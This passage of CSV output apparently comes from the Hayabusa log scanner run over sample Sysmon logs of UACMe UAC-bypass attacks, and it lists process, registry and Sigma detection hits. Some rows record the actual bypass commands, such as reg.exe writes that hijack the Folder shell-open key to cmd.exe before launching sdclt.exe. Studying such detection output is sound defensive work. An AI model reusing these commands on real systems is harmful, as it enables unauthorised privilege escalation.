+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.508 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.875 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe 
-k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:36.239 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool 
UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 
747F3D96-9DB2-5D46-0000-00106DBDAF03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.267 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 
747F3D96-9DB0-5D46-0000-00108243AF03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.893 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.060 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 747F3D96-A105-5D46-0000-001071B8BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry 
Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.454 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.800 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.714 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: 
%TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:34:00.871 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:34:01.014 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: 
